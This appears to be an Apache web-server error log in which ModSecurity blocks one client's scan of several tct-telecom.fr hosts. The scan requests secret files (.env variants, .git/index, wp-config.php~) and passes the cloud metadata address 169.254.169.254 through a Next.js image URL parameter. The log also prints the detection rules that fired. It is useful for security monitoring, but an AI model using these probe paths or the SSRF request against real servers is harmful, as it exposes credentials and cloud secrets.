[Mon May 11 15:23:16.995608 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.999355 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.014060 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:17.031612 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.056579 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.058231 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:17.079206 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:17.089563 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.101112 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:17.119642 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.147639 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.176665 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.209603 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.239741 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.269123 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.300690 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.333647 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.360585 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.385362 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.410654 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.444636 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:2884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQeJEyNRN152ArOSM4wAAAFM"]
[Mon May 11 15:23:17.445601 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.468569 2026] [security2:error] [pid 1320674:tid 1320700] [client 195.178.110.133:2900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQaO9RdIr1DwxYR2SzwAAAMo"]
[Mon May 11 15:23:17.470588 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.502573 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.529604 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.554387 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.587675 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.612996 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.642578 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.667795 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.677383 2026] [security2:error] [pid 1320398:tid 1320411] [client 195.178.110.133:2928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQeJEyNRN152ArOSM5QAAAEs"]
[Mon May 11 15:23:17.698624 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.723296 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.753250 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.763604 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZaAAAAQo"]
[Mon May 11 15:23:17.763807 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZaAAAAQo"]
[Mon May 11 15:23:17.764063 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZaAAAAQo"]
[Mon May 11 15:23:17.782728 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZaQAAAQo"]
[Mon May 11 15:23:17.782924 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZaQAAAQo"]
[Mon May 11 15:23:17.783187 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZaQAAAQo"]
[Mon May 11 15:23:17.787529 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.811046 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZagAAAQo"]
[Mon May 11 15:23:17.811253 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZagAAAQo"]
[Mon May 11 15:23:17.811525 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZagAAAQo"]
[Mon May 11 15:23:17.818648 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.829455 2026] [security2:error] [pid 1319885:tid 1319915] [client 195.178.110.133:2980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQVchVQ3tCn0m9OpZMgAAAQ8"]
[Mon May 11 15:23:17.830085 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZawAAAQo"]
[Mon May 11 15:23:17.830287 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZawAAAQo"]
[Mon May 11 15:23:17.830536 2026] [security2:error] [pid 1319885:tid 1319903] [client 195.178.110.133:3530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRVchVQ3tCn0m9OpZawAAAQo"]
[Mon May 11 15:23:17.845583 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.870568 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.895623 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.902483 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:2880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQ-SQ-m-m0ukSShuCDgAAAVg"]
[Mon May 11 15:23:17.920412 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.959796 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:2880] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYReSQ-m-m0ukSShuCPgAAAVg"]
[Mon May 11 15:23:17.960010 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:2880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYReSQ-m-m0ukSShuCPgAAAVg"]
[Mon May 11 15:23:17.962032 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:17.990894 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.015822 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.041731 2026] [security2:error] [pid 1319885:tid 1319938] [client 195.178.110.133:2948] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYQ1chVQ3tCn0m9OpZNgAAARg"]
[Mon May 11 15:23:18.046739 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.071673 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.096491 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.115977 2026] [security2:error] [pid 1319886:tid 1319928] [client 195.178.110.133:3784] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRqy-5-wpj6Sx56aZDgAAABI"]
[Mon May 11 15:23:18.116723 2026] [security2:error] [pid 1319886:tid 1319928] [client 195.178.110.133:3784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRqy-5-wpj6Sx56aZDgAAABI"]
[Mon May 11 15:23:18.120992 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.556838 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.656297 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYRlchVQ3tCn0m9OpZbQAAARE"]
[Mon May 11 15:23:18.656491 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYRlchVQ3tCn0m9OpZbQAAARE"]
[Mon May 11 15:23:18.656708 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYRlchVQ3tCn0m9OpZbQAAARE"]
[Mon May 11 15:23:18.661270 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.680253 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRqt2WtvoFr7xvGzU2QAAAJQ"]
[Mon May 11 15:23:18.680389 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRqt2WtvoFr7xvGzU2QAAAJQ"]
[Mon May 11 15:23:18.684060 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRqt2WtvoFr7xvGzU2QAAAJQ"]
[Mon May 11 15:23:18.686353 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.690281 2026] [proxy_fcgi:error] [pid 1319998:tid 1320014] [client 195.178.110.133:3976] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:18.692878 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYRlchVQ3tCn0m9OpZcAAAARE"]
[Mon May 11 15:23:18.693005 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYRlchVQ3tCn0m9OpZcAAAARE"]
